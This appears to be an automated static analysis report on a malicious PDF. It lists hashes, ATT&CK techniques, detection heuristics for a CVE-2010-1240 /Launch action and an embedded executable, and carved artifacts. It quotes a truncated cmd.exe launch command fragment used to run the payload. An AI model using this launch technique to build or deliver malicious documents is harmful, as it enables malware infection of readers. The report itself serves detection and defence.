Malicious PDF — malware analysis report

Static analysis result for SHA-256 e7787c196f8ee035…

MALICIOUS

PDF

259.0 KB Created: 2010-05-27 22:13:33 -04:00 Authoring application: Writer (via OpenOffice.org 3.0)
MD5: 32b55ab7204f2c8eac0b6789b83e3b2a SHA-1: 72d545ef8128ad7e71a930328f1c45348142f792 SHA-256: e7787c196f8ee035ffca9c14739fb2c5114624aaeabe3ad331579191a94ecb43
406 Risk Score

Malware Insights

MITRE ATT&CK
T1204.002 Malicious File T1059.003 Windows Command Shell T1105 Ingress Tool Transfer

The PDF file contains a critical PDF_LAUNCH action that executes cmd.exe with parameters designed to run an embedded PE payload. This is a known technique for delivering malware, often used in advance-fee scams as indicated by the SE_ADVANCE_FEE_SCAM_LURE heuristic. The embedded executable payload and the launch action strongly suggest the document's purpose is to download and execute a second-stage payload.

Heuristics 12

  • Adobe Reader Launch action command execution critical CVE exact CVE_2010_1240
    PDF uses the Adobe Reader/Acrobat Launch action pattern associated with CVE-2010-1240: cmd.exe is invoked with attacker-controlled parameters, paired with an embedded/exported payload.
  • Launch action critical PDF_LAUNCH
    PDF contains a /Launch action whose target is an executable, URL, or UNC path — can start an external application
  • Embedded Windows executable payload in PDF stream critical PDF_EMBEDDED_PE_PAYLOAD
    PDF stream bytes contain an embedded Windows executable with a verified PE header. Exploit chains often hide droppers inside ordinary streams rather than standard /EmbeddedFile attachments.
  • /Launch action target: cmd.exe critical PDF_LAUNCH_COMMAND
    PDF /Launch action specifies an executable target with parameters '/Q /C %HOMEDRIVE%&cd %HOMEPATH%&(if exist "Desktop\\handbook.pdf" (cd "Desktop"' — references a known-dangerous executable (cmd, PowerShell, etc.).
  • ClamAV: Pdf.Tool.Agent-1388586 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Tool.Agent-1388586
  • Clickable PDF combines external action with parser-evasion structure high PDF_ACTION_PARSER_EVASION
    PDF has an external clickable URI together with object graph or xref structures that make parsers disagree, such as divergent duplicate objects, parser divergence, or xref offset mismatch. That combination is stronger than a plain link: the document is both an outward-action carrier and a parser-confusion/evasion sample.
  • Advance-fee lottery/parcel scam lure high SE_ADVANCE_FEE_SCAM_LURE
    Document contains lottery/beneficiary or prize language together with large-value draft/funds wording and parcel/courier delivery requirements. This is a classic advance-fee fraud document shape.
  • JavaScript action low PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
  • External URI info PDF_URI
    PDF contains an external URL action
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.suntrust.com/retirementsolutions
    • http://www.discoverybenefits.com/
    • http://www.cignabehavioral.com/
    • http://www.cign.com/
    • http://www.teldrug.com/
    • http://www.mycigna.com/
    • http://www.lifebenefits.com/
    • http://www.netbenefits.fidelity.com/
    • http://www.unum.com/
    • http://www.eyemedvisioncare.com/
    • http://www.kaiserpermanente.org/
    • http://www.cigna.com/
    • http://www.CIGNA.com/
    • http://www.cigna.com/healthyrewards

Extracted artifacts 9

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0274_000.js
ff55c3569615905a49995e011f58a5f14b9bcd78f90366bfed8a0a3717ddaa0c		 pdf-javascript-stream PDF /JS object 274 at offset 0x4078B 57 bytes
stream_043_off0003e52f.bin
1c1634873ea9549570bb1f7663f87cafc871ff6854aa491bd150c94a58742453		 decompressed-pdf-stream PDF FlateDecoded stream at offset 0x3E52F 29696 bytes
font_00_sfnt_off0001acc6.bin
1595e16a4f9a0296195e8dc1865868585c10d52861edb7be5bd8d7bb46db92b6		 pdf-font-stream PDF embedded font (sfnt) at offset 0x1ACC6 33568 bytes
font_01_sfnt_off0001f5e7.bin
34b0487b9d5db5448761716fd39edac50b029d9a55416c4f3c80a2767672c1b9		 pdf-font-stream PDF embedded font (sfnt) at offset 0x1F5E7 27004 bytes
font_02_sfnt_off0002290d.bin
daebbe6f5b3bb39df11cac5456a4dd34995b98a47d83eea0b3f52e995dd61225		 pdf-font-stream PDF embedded font (sfnt) at offset 0x2290D 31960 bytes
font_03_sfnt_off00026c0c.bin
84c02ed1e82014a67a7bc68df43de9ea2cab3e3cffaf559b8eb8f98dc2c1ba23		 pdf-font-stream PDF embedded font (sfnt) at offset 0x26C0C 25516 bytes
font_04_sfnt_off00029adf.bin
4027f6d872dc004d25fac9306111c00201f60500e4898dfe0941d608ccc2a3e6		 pdf-font-stream PDF embedded font (sfnt) at offset 0x29ADF 16476 bytes
font_05_sfnt_off0002ba18.bin
5d3b487106b60ccd273e9fbbc201f0d7bba5eba88fc208da91f96864df8478f7		 pdf-font-stream PDF embedded font (sfnt) at offset 0x2BA18 46720 bytes
font_06_sfnt_off00033197.bin
3a6f2930bb6cbd05763fa470b4e32e0c20dcc3efa4d1c4d37d1e60fd340f4b67		 pdf-font-stream PDF embedded font (sfnt) at offset 0x33197 21924 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.